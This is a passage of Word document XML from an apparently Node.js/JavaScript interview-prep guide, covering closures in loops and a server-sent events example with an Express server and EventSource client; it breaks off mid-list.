    <w:p w14:paraId="7850B552"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console.log(increment()); // 6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B490752"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console.log(increment()); // 7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAAAA6F"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console.log(increment()); // 8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D592F66" w14:textId="77777777" w:rsidR="00EE1AF6" w:rsidRPr="00DA2F32" w:rsidRDefault="00EE1AF6" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Advanced Interview Questions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117C5C69" w14:textId="77777777" w:rsidR="00EE1AF6" w:rsidRPr="00DA2F32" w:rsidRDefault="00EE1AF6" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="229"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>What is the difference between a closure and a higher-order function?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF1E176" w14:textId="77777777" w:rsidR="00EE1AF6" w:rsidRPr="00DA2F32" w:rsidRDefault="00EE1AF6" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="229"/>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A closure is a function that retains access to its lexical scope, while a higher-order function is a function that takes another function as an argument or returns a function. While closures are often used within higher-order functions, they are not the same thing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C636A58" w14:textId="77777777" w:rsidR="00EE1AF6" w:rsidRPr="00DA2F32" w:rsidRDefault="00EE1AF6" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="229"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>How do closures interact with loops in JavaScript?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF3A32F" w14:textId="77777777" w:rsidR="00EE1AF6" w:rsidRPr="00DA2F32" w:rsidRDefault="00EE1AF6" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="229"/>
        </w:num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A classic problem is using closures within loops, where all closures capture the same loop variable. This can be solved using let (which creates a new binding for each iteration) or by using an IIFE to create a new scope for each iteration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30CD2DA6"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for (var i = 0; i &lt; 3; i++) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5D0AC0"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(function(j) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E725298"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setTimeout(function() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D7922C"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console.log(j);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130F6CB1"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1000);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C97972"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3944FEA1"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6E935C4" w14:textId="77777777" w:rsidR="00EE1AF6" w:rsidRPr="00DA2F32" w:rsidRDefault="00EE1AF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Logs: 0, 1, 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BEA62DE" w14:textId="77777777" w:rsidR="005A3D24" w:rsidRPr="00DA2F32" w:rsidRDefault="005A3D24" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="379041E0" w14:textId="68081FCA" w:rsidR="00D246F0" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="70" w:name="_Toc178383253"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>What are server-sent events</w:t>
      </w:r>
      <w:bookmarkEnd w:id="70"/>
    </w:p>
    <w:p w14:paraId="2AA90049" w14:textId="77777777" w:rsidR="00260CA6" w:rsidRPr="00DA2F32" w:rsidRDefault="00260CA6" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Server-Sent Events (SSE)</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a standard allowing a server to push real-time updates to a client over a single HTTP connection. Unlike WebSockets, SSE is a one-way communication from the server to the client. In Node.js, SSE can be implemented to enable real-time data transmission, such as live feeds, notifications, or any scenario where the server needs to continuously push data to the client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307CAEDC" w14:textId="77777777" w:rsidR="00260CA6" w:rsidRPr="00DA2F32" w:rsidRDefault="00260CA6" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Key Concepts of Server-Sent Events (SSE)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A4D0C8F" w14:textId="77777777" w:rsidR="00260CA6" w:rsidRPr="00DA2F32" w:rsidRDefault="00260CA6" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="230"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>One-Way Communication</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E78D3C" w14:textId="77777777" w:rsidR="00260CA6" w:rsidRPr="00DA2F32" w:rsidRDefault="00260CA6" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="230"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>The server can send data to the client whenever new information is available.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="262214FC" w14:textId="77777777" w:rsidR="00260CA6" w:rsidRPr="00DA2F32" w:rsidRDefault="00260CA6" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="230"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>The client (usually a browser) establishes a single HTTP connection to receive updates from the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048BC764" w14:textId="77777777" w:rsidR="00260CA6" w:rsidRPr="00DA2F32" w:rsidRDefault="00260CA6" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="230"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Text/Event-Stream MIME Type</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016CF184" w14:textId="77777777" w:rsidR="00260CA6" w:rsidRPr="00DA2F32" w:rsidRDefault="00260CA6" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="230"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>The server sends data using the text/event-stream MIME type.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7A128B" w14:textId="77777777" w:rsidR="00260CA6" w:rsidRPr="00DA2F32" w:rsidRDefault="00260CA6" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="230"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Data is sent as a stream, with each event separated by a double newline (\n\n).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2526442D" w14:textId="77777777" w:rsidR="00260CA6" w:rsidRPr="00DA2F32" w:rsidRDefault="00260CA6" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="230"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Automatic Reconnection</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481243F2" w14:textId="77777777" w:rsidR="00260CA6" w:rsidRPr="00DA2F32" w:rsidRDefault="00260CA6" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="230"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>The client automatically reconnects if the connection is lost, making SSE reliable for continuous data streams.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC56D55" w14:textId="77777777" w:rsidR="00260CA6" w:rsidRPr="00DA2F32" w:rsidRDefault="00260CA6" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="230"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Simple API</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54004E96" w14:textId="77777777" w:rsidR="00260CA6" w:rsidRPr="00DA2F32" w:rsidRDefault="00260CA6" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="230"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>SSE uses a simple API on the client side (EventSource) to listen for messages from the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD3C24F" w14:textId="77777777" w:rsidR="00260CA6" w:rsidRPr="00DA2F32" w:rsidRDefault="00260CA6" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Implementing SSE in Node.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D2272B" w14:textId="77777777" w:rsidR="00260CA6" w:rsidRPr="00DA2F32" w:rsidRDefault="00260CA6" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Here's how you can implement Server-Sent Events in a Node.js application:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513567A0" w14:textId="77777777" w:rsidR="00260CA6" w:rsidRPr="00DA2F32" w:rsidRDefault="00260CA6" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1. Basic Setup on the Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F00B3C2"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68FCEC1F"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49FB4883"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PORT = 3000;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4819AEF8"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C5A30B8"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app.get('/events', (req, res) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B0BC767"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Set headers for SSE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DED9BFA"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res.setHeader('Content-Type', 'text/event-stream');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F858C54"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res.setHeader('Cache-Control', 'no-cache');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01654970"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res.setHeader('Connection', 'keep-alive');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25BEF5C7"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9E78D97"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Send a message every 2 seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332FA4F9"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intervalId = setInterval(() =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D8AEC0"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data = `data: ${new Date().toLocaleTimeString()}\n\n`;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B4C61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res.write(data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46213E45"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2000);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045EC0F3"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21CE2A0"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Clean up when the connection is closed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="692EDE60"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req.on('close', () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4616094D"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clearInterval(intervalId);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566FB58C"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res.end();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1694AF40"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113F999"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65B4A22"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737D53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app.listen(PORT, () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03FC6BAB"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console.log(`Server running on port ${PORT}`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05BB1ED2"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69A0B65" w14:textId="77777777" w:rsidR="00260CA6" w:rsidRPr="00DA2F32" w:rsidRDefault="00260CA6" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>2. Client-Side Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB408DF" w14:textId="77777777" w:rsidR="00260CA6" w:rsidRPr="00DA2F32" w:rsidRDefault="00260CA6" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>On the client side, you can listen for messages using the EventSource API:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A1933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&lt;!DOCTYPE html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9A709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&lt;html lang="en"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02DF0EA1"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&lt;head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4240F6ED"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&lt;meta charset="UTF-8"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514DC408"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&lt;meta name="viewport" content="width=device-width, initial-scale=1.0"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6640E5"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&lt;title&gt;SSE Example&lt;/title&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D470C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&lt;/head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F8399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&lt;body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC757BC"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&lt;h1&gt;Server-Sent Events&lt;/h1&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637DBDE8"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&lt;div id="events"&gt;&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69EB5BCC"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52D9E3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&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="421C7109"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eventSource = new EventSource('/events');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58294F2B"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3CF09D9"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eventSource.onmessage = function(event) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B9B2E1"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eventsDiv = document.getElementById('events');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071054E8"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newEvent = document.createElement('p');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189602C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newEvent.textContent = event.data;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF646F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eventsDiv.appendChild(newEvent);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0E53EA"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CB62973"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360FAEC"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eventSource.onerror = function() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A86D08E"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console.log('Connection lost. Attempting to reconnect...');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60FBA07D"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048D180"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&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7499D92A"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&lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2D0CE7" w14:textId="77777777" w:rsidR="00260CA6" w:rsidRPr="00DA2F32" w:rsidRDefault="00260CA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&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5454E271" w14:textId="77777777" w:rsidR="00260CA6" w:rsidRPr="00DA2F32" w:rsidRDefault="00260CA6" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Key Points in the Implementation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="577FF1CD" w14:textId="77777777" w:rsidR="00260CA6" w:rsidRPr="00DA2F32" w:rsidRDefault="00260CA6" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="231"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>HTTP Headers</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626C1CC3" w14:textId="77777777" w:rsidR="00260CA6" w:rsidRPr="00DA2F32" w:rsidRDefault="00260CA6" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="231"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
